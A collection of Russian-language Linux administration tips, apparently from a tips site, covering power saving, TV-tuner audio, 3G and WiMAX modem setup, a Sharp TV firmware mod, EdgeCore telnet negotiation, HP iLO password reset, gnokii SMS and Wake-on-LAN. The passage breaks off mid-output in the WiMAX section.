1. Включение ALPM позволит сэкономить 1-2 Вт энергии, но может привести к повреждению данных для некоторых устройств. echo SATA_ALPM_ENABLE=true | sudo tee /etc/pm/config.d/sata_alpm 2. Изменение фона рабочего стола на более светлый цвет для ноутбука с LCD-экраном увеличит продолжительность работы примерно на 1%. 3. Включение режима энергосбережения RC6 для видеокарт Intel i915 через передачу параметра ядра i915.i915_enable_rc6=1 позволит сэкономить 25-40% энергии для устройств на базе архитектуры Sandybridge, но в редких случаях может привести к зависанию на определённых ноутбуках. 4. Включение режима сжатия фреймбуфера (Frame Buffer Compression) для драйвера i915 через передачу параметра ядру i915.i915_enable_fbc=1 позволит сэкономить до 0.6 Вт. 5. Установка задержки гашения обратного хода луча вертикальной развёртки (DRM vblank off) через параметр ядра drm.vblankoffdelay=1 сократит число вызывающих пробуждение процессора событий (wakeup events) и возможно сэкономит немного энергии. 6. Отключение всех беспроводных подсистем, если они не используются. В частности отключение bluetooth ("blacklist bluetooth" в /etc/modprobe.d/blacklist.conf) приведёт к экономии 1-2 Вт. 7. Отключение web-камеры ("blacklist uvcvideo" в /etc/modprobe.d/blacklist.conf) поможет сэкономить 1-2 Вт. 8. Использование утилиты PowerTop для перевода следующих устройств в состояние экономного потребления энергии: * Webcam * Audio * DRAM * Ethernet * Wifi * Bluetooth * SATA * MMC/SD 9. Использование ядра Linux в котором решена проблема с активацией ASPM (Active State Power Management) для карт PCI Express. Ядро тестовой ветки Ubuntu 12.04 уже содержит нужный патч. Для других систем рекомендуется в качестве обходного пути передать ядру параметр "pcie_aspm=powersave", который по умолчанию активирует режим максимальной экономии энергии (иначе, будет использован режим максимальной производительности). Для некоторых моделей ноутбуков данное действие может привести к снижению энергопотребления на 10-30%. 10. Приглушение яркости экрана до 2/3 от максимального значения сэкономит 1 Вт. 11. Отключение мерцающего курсора в gnome-terminal позволит избавиться от лишних пробуждений процессора: gconftool-2 --type string --set /apps/gnome-terminal/profiles/Default/cursor_blink_mode off 12. Выявление проблем с излишне частым пробуждением процессора и излишней нагрузкой на CPU для часто используемых приложений при помощи пакета powertop или утилит eventstat и cpustat из PPA репозитория colin-king/powermanagement. Например для выявления наиболее активных событий за 10 секунд: sudo eventstat 10 1 Evnt/s PID Task Init Function Callback 96.10 12659 npviewer.bin hrtimer_start_range_ns hrtimer_wakeup 58.10 0 [kern sched] Load balancing tick tick_sched_timer 49.80 2026 alsa-source hrtimer_start_range_ns hrtimer_wakeup 49.30 2024 alsa-sink hrtimer_start_range_ns hrtimer_wakeup 47.20 0 kworker/0:0 hrtimer_start_range_ns tick_sched_timer Для мониторинга в течение 60 секунд и вывода процессов, генерирующих более 5 событий в секунду: sudo eventstat -t 5 60 1 Evnt/s PID Task Init Function Callback 54.00 2003 compiz hrtimer_start_range_ns hrtimer_wakeup 49.35 2024 alsa-sink hrtimer_start_range_ns hrtimer_wakeup 18.92 0 [kern sched] Load balancing tick tick_sched_timer 17.57 0 kworker/0:0 hrtimer_start_range_ns tick_sched_timer 16.13 0 [kern core] usb_hcd_poll_rh_status rh_timer_func 9.98 2386 gwibber-service hrtimer_start_range_ns hrtimer_wakeup 9.88 10063 desktopcouch-se hrtimer_start_range_ns hrtimer_wakeup 9.87 2382 ubuntuone-syncd hrtimer_start_range_ns hrtimer_wakeup 9.83 10109 desktopcouch-se hrtimer_start_range_ns hrtimer_wakeup 5.23 0 [kern core] hrtimer_start tick_sched_timer 12046 Total events, 200.77 events/sec

Как решить проблему с отсутствием звука при использовании TV-тюнера в Ubuntu (доп. ссылка 1) [комментарии]

При работе с некоторыми TV-тюнерами, например с wintv hvr 950Q, в Ubuntu наблюдаются проблемы со звуком. Каналы ловятся, но звука нет ни в одном приложении. Решить проблему можно, организовав параллельное проигрывание звука в фоне с ассоциированной с TV-тюнером звуковой карты. Запускаем tvtime или другое приложение для работы с тюнером: tvtime Запускаем проигрывание звука. Если используется система alsa, поможет команда arecord -D hw:1,0 -f S16_LE -c2 -r32000 | aplay -q - Либо загружаем в PulseAudio модуль loopback: pactl load-module module-loopback В этом случае, возможно, так же нужно будет выбрать конкретный порт источника с помощью pactl set-source-port. В первом случае для прекращения перенаправления достаточно убить программу. Во-втором - нужно будет выполнить pactl unload-module с номером загруженного модуля (номер получите при загрузке). Всё это можно запустить одной командой, на основе которой можно создать ярлык для запуска tvtime: tvtime | arecord -D hw:1,0 -r 32000 -c 2 -f S16_LE | aplay -q - А вот пример скрипта для запуска с помощью pulseaudio: tvtime & sleep 5 pactl set-source-port alsa_input.pci-0000_0d_00.0-usb-0_1.analog- stereo analog-input-video pactl load-module module-loopback source="alsa_input.pci-0000_0d_00.0-usb-0_1.analog-stereo" source_dont_move=true В последнем случае мы указываем конкретный источник (alsa_input.pci-0000_0d_00.0-usb-0_1.analog-stereo) и указываем, что он не должен меняться (source_dont_move=true). Если в системе имеется несколько звуковых карт, то вместо "hw:1,0" может потребоваться указать другое устройство, например, "hw:2,0". Список устройств можно посмотреть командой: arecord -l Для pulseaudio список можно посмотреть командой pactl list sources или pacmd list-sources

Настройка 3G-модема Huawei E173 в Ubuntu/Debian без использования оболочки МегаФона [комментарии]

Для того, чтобы модем Huawei E173 определился в системе не только как Flash-диск, необходимо установить пакет usb-modeswitch, который можно найти в стандартном репозитории universe: sudo apt-get install usb-modeswitch usb-modeswitch-data После этого модем будет определен как ttyUSB0. $ dmesg| tail [310579.743098] USB Serial support registered for GSM modem (1-port) [310579.745647] option 2-3:1.0: GSM modem (1-port) converter detected [310579.751377] usb 2-3: GSM modem (1-port) converter now attached to ttyUSB0 Если не заработало, выясняем идентификатор устройства: $ lsusb Bus 002 Device 050: ID 12d1:140c Huawei Technologies Co., Ltd. Проверяем наличие файла "12d1:*" в /etc/usb_modeswitch.d, в одном из файлов должно быть упоминание продукта "1446". Например: # Huawei E270+ (HSPA+ modem) DefaultVendor= 0x12d1 DefaultProduct=0x1446 TargetVendor= 0x12d1 TargetProductList="1001,1406,140c,14ac" CheckSuccess=20 MessageContent="55534243123456780000000000000011060000000000000000000000000000" Если файла нет, то его можно создать по вышеприведенному примеру, просто добавив строки: DefaultVendor= 0x12d1 DefaultProduct= 0x140c В дальнейшем модем будет доступен через /dev/ttyUSB0 и его можно настроить вручную через запуск pppd или через конфигураторы Network Manager, kppp или wvdial. В качестве APN следует указать - internet, в качестве логина и пароля - gdata/gdata, номер - "*99#". Аналогично настраиваются соединения для работы с модемами других сотовых операторов. Для МТС значение APN internet.mts.ru, логин/пароль - mts, для Beeline APN - internet.beeline.ru, логин/пароль - beeline.

Установка mplayer на телевизор SHARP 42SH7 (доп. ссылка 1) Автор: Михаил [комментарии]

Как известно, у LCD-телевизора SHARP 42SH7 есть USB-вход, над которым написано SERVICE. Любая попытка подключить туда флэшку с видео не приведет к успеху. И это логично, ведь через USB нужно сначала залить медиаплеер! Все дело в том, что этот телевизор содержит функцию показа телетекста и имеет четыре банка памяти, куда загружаются растеризованные шрифты. Так как иероглифы нам не нужны, то мы оставим только английский язык, а в освободившуюся память используем под mplayer, мощный и быстрый плеер с поддержкой проигрывания множества видео и аудио-форматов. Для начала надо скачать архив с сайта sharp-club.net (ссылка для загрузки доступна только зарегистрированным пользователям). Кроме архива нужна-USB клавиатура, калькулятор и оригинальный японский телевизор SHARP 42SH7. Внимание! Все телевизоры с локализацией, без возможности смены языка на оригинальный японский - урезаны по функциональности, вместо четырех банков памяти содержится только один. Попытка перезаливки на такой телевизор приведет к его поломке и отказу сервисной службы в его ремонте! Использовать предложенную прошивку можно только обладателям нормального "японца". В приложенном архиве лежат следующие файлы: service.iso firmwaresh7.bin sh7hack.bin mplayer.bin english.tbz mplayer.tar.gz ddump.exe Самое главное - это service.iso. Его надо залить на любую флешку, но не в виде файла, а побайтово, так как это - образ загрузки. Используйте стандартную Unix-утилиту dd или, в случае использования Windows, программу ddump.exe из комплекта. Вся информация будет удалена с флешки. После заливки надо будет залить на флешку файлы из архива: firmwaresh7.bin sh7hack.bin mplayer.bin english.tbz mplayer.tar.gz - это исходный код плеера с нужными патчами, его можно переделать под свои нужды, например - добавить русский язык. У пользователей Linux проблем с копированием файлов не возникнет. Из Windows просто так файлы не залить, потому что на флешке используется файловая система ext2. Если под рукой нет Linux, придется искать и ставить драйвер. Переключите в телевизоре язык на английский. Вставьте флешку и включите телевизор. Через 30-70 секунд вы увидите иероглифы. Это значит, что ваша прошивка сохранилась на флешку, а в телевизор влилась заводская прошивка. Выньте флешку, вставьте usb-клавиатуру, выключите телевизор и включите снова. Вы перешли в режим инженерной работы с телевизором, интерфейс которого базируется на пакете Busybox. Теперь главное ничего не перепутать! Введите следующую команду: du -hs /var/ram/tvtext Появившееся на экране число - размер шрифтов с поддержкой юникода, точнее, их растеризованный размер. Проверьте, что у вас выдает 8M или 16M. Если это не так, значит, у вас маленький размер банков памяти, и ничего не выйдет - выключите свой телевизор, вставьте флешку и включите его. Загрузится оригинальная прошивка firmwaresh7.bin и все станет, как и было раньше. Дальше можно не читать... Итак, самый ответственный момент. В случае ошибки - обратного пути не будет. Обратите внимание, что сейчас придется работать в редакторе vi. Эффективность данного редактора в полной мере могут оценить только имеющие опыт работы в vi. Для тех, кто имеет опыта работы в vi, лучше предварительно прочитать инструкцию, разобраться в основах редактирования и потренироваться. Вводите следующую команду: vi /dev/fram/etc/rc Перейдите ниже к строке: cat /mnt/flash/firmwaresh7.bin > /dev/fram2; reboot И замените ее на: cat /mnt/flash/sh7hack.bin > /dev/fram2 cat /mnt/flash/mplayer.bin > /dev/fram3 tar jxf /mnt/flash/english.tbz -C /dev/fram4 reboot Выключайте телевизор, вставьте флешку и включайте. У вас загрузится модифицированная прошивка, которая позволяет запускать mplayer, сам mplayer и англоязычные шрифты. Флешку после этого можно вынимать, там будет файл типа _00001.bin - это архив вашей оригинальной прошивки. Его лучше сохранить на всякий случай. Теперь в меню ТВ появился новый пункт: "mplayer". Он станет активным, когда будет вставлена флешка с фильмами. Да, сами фильмы нужно называть только английскими буквами, иначе они не появляются в списке меню. Фильмы должны быть размещены на флешке, отформатированной с файловой системой ext2. FAT32 телевизор не поддерживает. В заключение скажу, что работа плеера меня несколько огорчила. Файлы mkv проигрываются очень плохо - звук идет нормальный, а изображение идет рывками, с пропуском кадров. Так что нормально можно смотреть только AVI или MP3.

Как установить telnet-сессию с коммутатором EdgeCore из скрипта (доп. ссылка 1) Автор: Андрей Сергиенко [комментарии]

Есть известная "проблема": из скрипта (php, perl, python и т.п.) средствами самого языка установить telnet-соединение с коммутаторами EdgeCore не получается. Сразу после соединения свитч присылает бинарный "мусор", потом коннект просто висит и отваливается по таймауту. Т.е. даже строки приглашения от коммутатора получить не удается. В то же время тот же самый скрипт может прекрасно работать по телнету с D-Link'ами. Происходит это потому что edgecorе'ам надо согласовывать параметры терминала при поднятии телнет-сессии. Т.е. сначала (сразу после коннекта на 23-й порт) передать свитчу желаемые параметры сессии - и только после этого он передаст окно приглашения и с ним можно будет работать. Пример рабочей последовательности параметров: 0xFF 0xFD 0x03 0xFF 0xFB 0x18 0xFF 0xFB 0x1F 0xFF 0xFB 0x20 0xFF 0xFB 0x21 0xFF 0xFB 0x22 0xFF 0xFB 0x27 0xFF 0xFD 0x05 0xFF 0xFA 0x18 0x00 0x58 0x54 0x45 0x52 0x4D 0xFF 0xF0 0xFF 0xFD 0x01 0xFF 0xFC 0x01 Что интересно - в таком виде отлично работается и с edgecore'ами, и с d-link'ами. Хотя для d-link'ов такая "инициализация" и необязательна.

Сброс забытого пароля HP iLO из консоли Debian GNU/Linux (доп. ссылка 1) Автор: Андрей [комментарии]

Возникла необходимость сброса утерянного пароля к iLO, на сервере HP DL360G4. Сбросить пароль можно при помощи утилиты hponcfg, которую можно загрузить из специального репозитория на сайте HP. Репозиторий доступен для большого числа популярных Linux-дистрибутивов, среди которых и Debian GNU/Linux. Для работы утилиты потребуется установить два пакета: hponcfg_3.1.0.0.18-19_i386.deb и hp-health_8.5.0.1.2-1_i386.deb: wget http://downloads.linux.hp.com/SDR/psp/pool/non-free/hponcfg_3.1.0.0.18-19_i386.deb wget http://downloads.linux.hp.com/SDR/psp/pool/non-free/hp-health_8.5.0.1.2-1_i386.deb Устанавливаем данные пакеты и стандартный пакет binutils: sudo apt-get install binutils sudp dpkg -i hp-health_8.5.0.1.2-1_i386.deb sudo dpkg -i sudo dpkg -i hponcfg_3.1.0.0.18-19_i386.deb Настройка iLO осуществляется через xml-файлы. Файл ilo_reset_password.xml используется для сброса пароля iLO: <RIBCL VERSION="2.0"> <LOGIN USER_LOGIN="Administrator" PASSWORD="some_ilo_password"> <USER_INFO MODE="write"> <MOD_USER USER_LOGIN="Administrator"> <PASSWORD value="new_password"/> </mod_USER> </user_INFO> </LOGIN> </RIBCL> В параметре PASSWORD значение new_password заменяем на необходимый пароль и выполняем команду: sudo hponcfg -f ~/ilo_reset_password.xml Файл ilo_network.xml используется для настройки сети iLO: <RIBCL VERSION="2.0"> <LOGIN USER_LOGIN="Administrator" PASSWORD="iLOPassword"> <RIB_INFO MODE="write"> <MOD_NETWORK_SETTINGS> <SPEED_AUTOSELECT value="No"/> <FULL_DUPLEX value="Yes"/> <NIC_SPEED value="100"/> <DHCP_ENABLE value="No"/> <IP_ADDRESS value="10.20.30.2"/> <SUBNET_MASK value="255.255.255.0"/> <GATEWAY_IP_ADDRESS value="10.20.30.254"/> <DNS_NAME value="ILOCZC73424J4"/> <DOMAIN_NAME value=""/> <DHCP_GATEWAY value="No"/> <DHCP_DNS_SERVER value="No"/> <DHCP_STATIC_ROUTE value="No"/> <REG_WINS_SERVER value="No"/> <PRIM_DNS_SERVER value="0.0.0.0"/> <SEC_DNS_SERVER value="0.0.0.0"/> <STATIC_ROUTE_1 DEST="0.0.0.0" GATEWAY="0.0.0.0"/> <STATIC_ROUTE_2 DEST="0.0.0.0" GATEWAY="0.0.0.0"/> </MOD_NETWORK_SETTINGS> </RIB_INFO> </LOGIN> Для загрузки отсеченных в файле конфигурации настроек выполняем: sudo hponcfg -f ~/ilo_network.xml Чтобы изменения подействовали требуется перезагрузка iLo, которую можно выполнить создав файл ilo_reboot.xml: <RIBCL VERSION="2.0"> <LOGIN USER_LOGIN="Administrator" PASSWORD="iLOPassword"> <RIB_INFO MODE="write"> <RESET_RIB/> </RIB_INFO> </LOGIN> </RIBCL> и выполнив команду sudo hponcfg -f ~/ilo_reboot.xml

Прием и отправка SMS в Linux [комментарии]

Для организации автоматизации приема и отправки SMS в Linux можно использовать пакет gnokii и подключенный к системе телефон. В простейшем случае можно использовать возможность консольной утилиты gnokii из пакета gnokii-cli, но при необходимости более сложной автоматизации имеет смысл воспользоваться Perl-модулем GSM::SMS или GSMD::Gnokii. Устанавливаем gnokii, для Debian/Ubuntu: sudo apt-get install gnokii-cli gnokii-smsd xgnokii , где gnokii-cli - интерфейс командной строки, gnokii-smsd демон для работы с SMS, а xgnokii - GUI интерфейс. Последние два ставим на свое усмотрение. Подключаем телефон через USB-порт. Смотрим в /var/log/messages к какому устройству осуществилась привязка (например, /dev/ttyACM0) Создаем файл конфигурации /home/mc/.gnokiirc [global] model = AT connection = serial port = /dev/ttyACM0 где, model - тип устройства: AT - для большинства телефонов, series40 - для телефонов Nokia с системой series40, gnapplet для старых телефонов Nokia Series60. connection - тип соединения serial - USB/RS-232, irda - инфракрасный порт, bluetooth - Bluetooth. port - порт, для USB - /dev/ttyACM0 или /dev/ttyUSB0, для Bluetooth указываем адрес устройства ("aa:bb:cc:dd:ee:ff"). Для USB-устройств также можно попробовать сочетание connection=dku2libusb и port = N, где N - номер устройства. Проверяем поддерживается ли телефон: gnokii --identify GNOKII Version 0.6.28 IMEI : IMEI56565656565656 Manufacturer : Motorola CE, Copyright 2000 Model : GSM900","GSM1800","GSM1900","MO Product name : GSM900","GSM1800","GSM1900","MO Revision : R368_G_0B.A0.0FR Для мониторинга активности: gnokii --monitor Возможности gnokii позволяют достаточно полно контролировать телефон, но нас интересует работа с SMS. Чтение SMS: gnokii --getsms тип_памяти старт стоп где тип_памяти: SM - для SIM-карты, ME - для внутренней памяти и MT для комбинированных хранилищ, IN - inbox, OU - outbox. Посмотреть какое хранилище используется на телефоне можно командой "gnokii --showsmsfolderstatus" старт - начальная позиция сообщения cтоп - конечная позиция сообщения, если не указать будет прочитано одно сообщение, если указать "end" будут выведены все сообщения до конечной позиции Пример для вывода всех сохраненных SMS: gnokii --getsms MT 1 end Для отправки SMS можно использовать команду: echo "текст" | gnokii --sendsms номер Например: echo "тест" | gnokii --sendsms '+79094126426' Send succeeded with reference 131! Другой способ отправки: в комплекте с Perl-модулем SMS::Send поставляется утилита xpl-sender, которую можно использовать не только как пример для написания скриптов, но и отправлять через неё сообщения: xpl-sender -m xpl-cmnd -c sendmsg.basic to=+7909344355 body="test" Вывод содержимого адресной книги: gnokii --getphonebook MT 1 end Адресную книгу можно сохранить, а затем восстановить: gnokii --getphonebook MT 1 end --vcard > phonebook.txt gnokii --writephonebook --vcard < phonebook.txt Настройка SMS-шлюза В состав gnokii входит демон SMSD, который позволяет организовать работу полноценного SMS-шлюза, на лету обрабатывающего входящие SMS. Для хранения отправляемых и получаемых сообщений SMSD может использовать СУБД MySQL, PostgreSQL (плагины gnokii-smsd-mysql и gnokii-smsd-pgsql) или файловое хранилище (--module file). Ставим недостающие пакеты: sudo apt-get install gnokii-smsd-mysql mysql-server Создаем БД mysql -u smsgw > create database smsgw; Создаем структуру БД, используя поставляемый в комплекте с gnokii-smsd-mysql пример: mysql -u smsgw smsgw < /usr/share/doc/gnokii-smsd-mysql/sms.tables.mysql.sql в результате будут созданы три простые таблицы inbox, outbox и multipartinbox, структура которых имеет следующий вид: CREATE TABLE inbox ( id int(10) unsigned NOT NULL auto_increment, number varchar(20) NOT NULL default '', smsdate datetime NOT NULL default '0000-00-00 00:00:00', insertdate timestamp DEFAULT CURRENT_TIMESTAMP, text text, phone tinyint(4), processed tinyint(4) NOT NULL default '0', PRIMARY KEY (id) ); CREATE TABLE outbox ( id int(10) unsigned NOT NULL auto_increment, number varchar(20) NOT NULL default '', processed_date timestamp DEFAULT 0, insertdate timestamp DEFAULT CURRENT_TIMESTAMP, text varchar(160) default NULL, phone tinyint(4), processed tinyint(4) NOT NULL default '0', error tinyint(4) NOT NULL default '-1', dreport tinyint(4) NOT NULL default '0', not_before time NOT NULL default '00:00:00', not_after time NOT NULL default '23:59:59', PRIMARY KEY (id) ); CREATE TABLE multipartinbox ( id int(10) unsigned NOT NULL auto_increment, number varchar(20) NOT NULL default '', smsdate datetime NOT NULL default '0000-00-00 00:00:00', insertdate timestamp DEFAULT CURRENT_TIMESTAMP, text text, phone tinyint(4), processed tinyint(4) NOT NULL default '0', refnum int(8) default NULL, maxnum int(8) default NULL, curnum int(8) default NULL, PRIMARY KEY (id) ); Запускаем smsd: /usr/sbin/smsd -u smsgw -d smsgw -c localhost -m mysql -f /var/log/smsdaemon.log где "-u" - имя пользователя БД, "-d" - имя базы, "-с" - хост, а "-m" - модуль хранения. Отправив теперь SMS на подключенный к компьютеру телефон, smsd сразу перехватит его и запишет в базу. выполнив "select * from inbox;" увидим примерно такое: | id | number | smsdate | insertdate |text | phone | processed | | 1 | +7909343156224 | 2011-01-20 10:12:05 | 20110120130123 | Test | NULL | 0 | Для отправки сообщения достаточно добавить новую запись в таблицу outbox, smsd сразу его подхватит его и отправит. Например: insert into outbox (number,text) values('+7909344355', 'Тест); В заключение можно отметить, что smsd может работать без СУБД, используя файловое хранилище. Пример запуска: /usr/sbin/smsd -m file -c spool-директория Для отправки SMS в spool-директории нужно создать файл с любым именем в формате: номер текст после успешной отправки файл будет удален. Через опцию "-u" можно указать путь к скрипту, который будет выполняться при каждом получении SMS. Иначе входящие сообщения будут выводиться в стандартный выходной поток в формате "действие номер дата < текст". Дополнение: Вместо gnokii можно использовать интенсивно развивающийся форк [[http://wammu.eu/ gammu]], содержащий поддержку некоторых дополнительных телефонов.

Настройка в Linux удаленного включения машины при помощи Wake On Lan (доп. ссылка 1) Автор: ashep [комментарии]

Задача: обеспечить возможность удаленного включения компьютера с другой машины в локальной сети. Для того, чтобы иметь возможность разбудить компьютер удалённо, необходимо, чтобы в нём был установлен источник питания ATX версии не ниже 2.01, материнская плата, поддерживающая Wake On Lan, а также сетевая плата с поддержкой этой технологии. Настройка Определить, поддерживает ли материнская плата вашего компьютера Wake On Lan, можно зайдя в настройки CMOS Setup в раздел настроек управления питанием. Найдите там опцию "Wake On Lan" и убедитесь, что она включена. После загрузки системы установите, если необходимо, пакет ethtool, при помощи которого можно в том числе и переключать сетевую плату в режим пробуждения по сигналу Wake On Lan от других машин: sudo apt-get install ethtool Далее, необходимо определить, поддерживает ли установленная сетевая плата Wake On Lan, и включена ли эта опция: sudo ethtool eth0 | grep -i wake-on Supports Wake-on: pumbg Wake-on: d В строке Supports Wake-On перечислены механизмы, поддерживаемые сетевой платой. В моём примере я пользуюсь методом отправки так называемым Magic Packet, и если вам нужно то же самое, то убедитесь, что в Supports Wake On присутствует буква "g". Буква "d" в строке Wake-on обозначает, что Wake On Lan для данного сетевого интерфейса отключён. Чтобы включить его в режим распознавания Magic Packet, необходимо выполнить: ethtool -s eth0 wol g Имейте ввиду, что после включения компьютера, вероятней всего, опция Wake-on опять перейдёт в состояние "d" и, если вам нужно, добавьте приведённую выше команду куда-нибудь в /etc/rc.local. Теперь всё готово для пробуждения системы по получению Magic Packet. Для того, чтобы его отправить, необходимо знать MAC-адрес сетевого интерфейса включаемого компьютера, поэтому прежде, чем выключать систему, запишите его: ifconfig eth0 | grep -i hwaddr eth0 Link encap:Ethernet HWaddr 00:0e:2e:b9:cb:ad Теперь можно выключать систему: sudo shutdown -h now Включение Теперь с любого другого компьютера, находящегося в том же сегменте локальной сети (в принципе, это необязательно, но тогда необходимо, чтобы в вашей сети маршрутизаторы корректно пробрасывали широковещательные пакеты), можно включить ранее сконфигурированную удалённую систему. Для этого понадобится утилита wakeonlan, которую необходимо установить: sudo apt-get install wakeonlan Разбудить выключенную систему теперь можно командой (обратите внимание, wakeonlan не требует прав суперпользователя): wakeonlan -p 8 00:0e:2e:b9:cb:ad Опцией -p указывается номер UDP-порта, с которого будет отправлен Magic Packet. Указание этой опции обязательно, поскольку по умолчанию wakeonlan использует девятый порт, помеченный в /etc/services как discard, что означает то, что пакет с этого порта отправить не получится. В принципе, можно использовать любой незанятый в системе UDP-порт.

Настройка 4G WiMAX-модема на чипах Beceem в Linux Автор: Oddentity [комментарии]

Недавно в инете появился Sprint 4G Depelopment Pack, содержащий исходники драйверов и API для модемов на чипсете Beceem, а также документацию и различные тестовые утилиты. К сожалению, поставляемая документация местами не соотвествует, описывает прежнюю версию драйверов и многое пришлось додумывать по ходу. В частности, там заявлено ядро версии от 2.6.9 и выше. На самом же деле, требуется ядро минимум 2.6.29 т.к. используются некоторые функции USB Core API, которых нет в прежних ядрах. В этом был первый долгий затык - попытка установить на CentOS 5.5. Необходимые требования для сборки и корректной работы: - Ядро Linux версии не ниже 2.6.29 - Административный доступ с правами root - Пакеты linux-source, kernel-headers, openssl 0.9.8, С-compiler, usb-modeswitch и др. В этой статье описывается установка на Ubuntu-server-10.10 i386 с ядром 2.6.35. Используется 4G-модем Huawei BM338 на чипсете Beceem BCSM250 от провайдера byfly (Белтелеком). Модем позиционируется как решение Mobile-WiMAX и работает на частоте 3,5 ГГц. Сссылка на архив Sprint 4G Depelopment Pack: http://developer.sprint.com/getDocument.do?docId=101032 1. Подготовка ядра Устанавливаем все необходимые пакеты: apt-get install linux-source linux-headers-$(uname -r) openssl unzip dos2unix patch cd /usr/src tar xvfj linux-source-2.6.35.tar.bz2 cd linux-source-2.6.35 make oldconfig && make prepare make modules_prepare 2. Установка и настройка usb-modeswitch Утилита usb_modeswitch необходима для автоматического переключения устройства из режима ZeroCD (на котором драйвера для Windows) в режим модема. Если запустить lsusb, то увидим устройство в режиме ZeroCD: Bus 001 Device 003: ID 198f:bccd Beceem Communications Inc. Устанавливаем: apt-get install usb-modeswitch cat /etc/usb_modeswitch.d/198f\:bccd >> /etc/usb_modeswitch.conf Редактируем файл /lib/udev/rules.d/40-usb_modeswitch.rules - можно удалять описания всех устройств, кроме Beceem. Должно остаться что-то вроде: LABEL="modeswitch_rules_begin" # Beceem BCSM250 ATTRS{idVendor}=="198f", ATTRS{idProduct}=="bccd", RUN+="usb_modeswitch '%b/%k'" LABEL="modeswitch_rules_end" Перезапускаем udev: service udev restart Теперь, если снова вставить модем, вывод lsusb должен быть такой: Bus 001 Device 003: ID 198f:0220 Beceem Communications Inc. - 198f:bccd поменялся на 198f:0220 3. Установка модуля ядра и Beceem API Library Распаковываем скачанный архив: tar xvfz Sprint4GDeveloperPack-1.1.tar.gz cd Sprint4GDeveloperPack-1.1 Собираем: ./install.sh Скрипт задаст ряд вопросов по поводу расположения директорий, главное указать правильную директорию с исходниками ядра. В моем случае это /usr/src/linux-source-2.6.35 Скрипт соберет модуль ядра drxvi314.so, библиотеку libxvi020.so и копирует прошивку девайса в /lib/firmware. После чего выдаст ошибку - остальные компоненты будем собирать позже вручную. Нам еще потребуется конфиг устройства от провайдера, берем его из папки с установленной программой в винде (Program files/Wimax Connection Manager/Driver/Firmware/macxvi.cfg) и кладем в /lib/firmware. Теперь загружаем модуль ядра: modprobe drxvi314 Если все прошло удачно - на модеме должен загореться красный светодиод. Также стоит глянуть вывод dmesg -c, там должно быть что-то типа ... [ 6.240000] [ 6.240035] register_networkdev:Beceem Network device name is eth1! ... ... [ 7.197554] usbcore: registered new interface driver usbbcm [ 7.197562] Initialised usbbcm Для автозагрузки добавляем drxvi314 в /etc/modules Поднимаем eth1: ifconfig eth1 up 4. Установка Beceem Connection Manager и библиотек unzip CSCM_v1.1.6.0_source.zip cd CSCM Т.к. в составе исходников не оказалось заголовочных файлов OpenSSL, качаем нужную версию с сайта: wget http://www.openssl.org/source/openssl-0.9.8o.tar.gz tar xvfz openssl-0.9.8o.tar.gz и кладем заголовочные файлы в нужные места: cp -R openssl-0.9.8o/include/openssl wpa_supplicant/openssl cp -R openssl-0.9.8o/crypto crypto cp -R openssl-0.9.8o/ssl ssl cp -R openssl-0.9.8o/e_os2.h e_os2.h cp -R openssl-0.9.8o/include/openssl BeceemEAPSupplicant/BeceemEngine/openssl cp -R openssl-0.9.8o/crypto BeceemEAPSupplicant/crypto cp -R openssl-0.9.8o/e_os2.h BeceemEAPSupplicant/e_os2.h ln -s /lib/libssl.so.0.9.8 /lib/libssl.so ln -s /lib/libcrypto.so.0.9.8 /lib/libcrypto.so Конвертируем build.sh в UNIX-формат и собираем: dos2unix build.sh chmod +x build.sh ./build.sh pc_linux В конце скрипта должно быть написано SUCCESS по всем компонентам. Кладем библиотеки, демон и клиент в нужные места: cp bin_pc_linux/bin/lib* /lib/ cp bin_pc_linux/bin/wimax* /usr/local/bin/ 5. Конфигурирование демона wimaxd Тут есть одна непонятная вещь, над которой тоже пришлось долго "плясать с бубном". Ранее, при сборке модуля ядра, мы уже скопировали конфиг устройства (файл macxvi.cfg), поставляемый провайдером. Такой же файлик есть и в архиве Sprint'а, но с ним модем ведет себя странно (не работают светодиоды, поиск БС происходит очень долго и т.д.). Но при этом, демон wimaxd, наоборот, корректно работает именно с конфигом Sprint'а (с родным провайдерским конфигом были проблемы с TLS-аутентификацией). В общем, в /lib/firmware/ должно быть 2 файла: macxvi.cfg - конфиг провайдера, его использует модуль ядра. macxvi-sprint.cfg - конфиг Sprint'а из архива (лежит в Sprint4GDeveloperPack-1.1/Rel_5.2.7.3P1_USB/Tools/config/CFG_files_for_VSG_testing/macxvi_VSG_2.6-3.5_FLASH_r37.cfg) - он нужен для демона wimaxd Создаем конфиг wimaxd, например /etc/wimaxd.conf После изучения документации, а также методом проб и ошибок получилось вот такое содержимое: /etc/wimaxd.conf: BandwidthMHz 10 CenterFrequencyMHz 3416 3426 3436 3446 3516 3526 3536 3546 AuthEnabled Yes EAPMethod 4 UserIdentity '6816C0B1C045@wimax.beltel.by' ValidateServerCert Yes CACertPath '/usr/local/beceem/certs' CACertFileName '/usr/local/beceem/certs/ca.pem' TLSDeviceCertFileName '/usr/local/beceem/certs/cpecert.pem' TLSDevicePrivateKeyFileName '/usr/local/beceem/certs/cpekey.pem' InnerNAIChange Yes BeceemEngineFileName '/lib/libengine_beceem.so' #AuthLogLevel 4 #AuthLogFileName '/tmp/CM_Auth.log' FirmwareFileName '/lib/firmware/macxvi200.bin' ConfigFileName '/lib/firmware/macxvi-sprint.cfg' Немного пояснений. Параметры BandwidthMHz и CenterFrequencyMHz взяты из настроек виндошной программы. EAPMethod 4 - EAP-TLS UserIdentity - логин. Первая часть логина до символа @ - это МАС-адрес устройства без двоеточий. Также взят из настроек виндошной программы. CACertPath, CACertFileName, TLSDeviceCertFileName, TLSDevicePrivateKeyFileName - пути к файлам сертификатов и ключей. Их нужно взять из папки с установленной программой в винде (Program Files/Wimax Connection Manager/cert/) и положить в указанную конфигом директорию. InnerNAIChange Yes - не знаю что это, но без этой опции ошибка аутентификации при подключении. FirmwareFileName, ConfigFileName - пути к файлам прошивки и конфига от Sprint'a 6. Подключение Запускаем демон: wimaxd -D -c /etc/wimaxd.conf Результатом правильной работы будет непрерывный вывод сообщения Link status = WAIT FOR PHY SYNC CMD - это значит, что демон готов принимать команды от клиента. Открываем другую консоль и запускам клиент: wimaxc -i Должно появится приглашение Beceem CM Server Version 1.1.6.0 > а в консоли демона сообщение Client socket 00000006 lock Beceem API: SUCCESS (wait = 0 ms) Client socket 00000006 unlock Beceem API: Success Начинаем сканирование: > search Через секунд 30 клиент выдаст найденные BSIDs, что-то вроде такого: Network search returned 4 base stations. Idx BSID Pre Freq BW RSSI CINR 0 01:01:00:00:02:00:17:00 0x05 3416.000 10.000 